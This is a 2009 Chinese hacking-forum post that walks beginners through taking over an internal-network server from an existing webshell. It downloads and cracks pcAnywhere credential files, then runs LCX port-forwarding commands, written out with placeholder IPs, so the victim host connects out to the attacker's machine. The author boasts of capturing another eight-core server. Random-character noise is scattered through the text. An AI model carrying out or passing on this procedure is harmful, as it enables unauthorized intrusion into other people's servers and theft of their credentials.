|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
! e( k1 o7 g- L0 X: {9 X% ~" W
( m# b% U* f Q! j- _* t提权方法:pcanywhere+LCX5 F3 k6 o& Y# I; P. `% O
' j! a' V* [) C7 h- `, d
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
* J- C; O8 W, g, n; A% Q5 s" @% p" X2 B7 R) E& \. B2 n# j% Z
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。2 U, Q! Q [+ P3 @; F6 }& ?
# o9 I+ Y( D: D2 k7 A4 g4 Y8 {' T; W; m# N
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。' o( c; {( _" O D5 R
: F- D' T2 R9 S* V+ R
- s( [) H6 Q4 I: Y呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。( ]7 }3 V1 L4 ~, n
- I! i9 b0 c1 ^4 a8 d2 u
, Q/ `* U4 [0 Z! P) m* K9 R3 T8 {5 J% a/ |4 h
7 U+ K0 Z2 g2 Y) t. @9 q
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``! i1 @' C9 V k# N4 B' X
7 v: a; e$ T" T+ h
8 L% E0 Z1 _3 U" k. C3 `LCX的用法再简单说下:
: m0 q# W' `" [9 W }7 { r4 U5 g% A8 M* V( ~; n9 W+ _+ w/ E
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
1 l- z/ N( k5 a6 Z7 U( Y
& P, e( @4 f% u) \" S本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
* \& d, M2 K( s0 a- D8 H4 _& f Z
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。0 c1 N4 j! k; L* N* Y
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
( h/ e1 f9 A* ?) j {- c) N5 r8 a0 ~; Y k0 q+ g% Q
. q4 x3 X; z/ g1 f0 b: Y
9 u2 P, p! G: `) t6 `1 h
$ U P; _$ Z# t0 {# ?2 y呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
& c" c. C1 [ c) v8 M( n1 S4 U1 |% K2 v, I* j
! {# Y, N, e( E+ S+ `: W. A( K% g4 a9 a- n- @
3 S& ?% ~5 Z, A3 c
我们本地连接试试,输入我们刚破解的账号密码
6 `) Y$ R7 N4 ]5 h9 l1 z4 h. s1 m9 t+ L2 F
0 X" l: r1 V' V- N呵呵``连接成功,服务器不错,又一个8核^︵^
2 ~5 c# f, q3 d9 i) T! Y# S5 Q6 ]; [# t' ~0 e6 a
: b1 a1 ^5 I: F% T- \# P5 b9 s! P
# |. {% f; Z) w |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
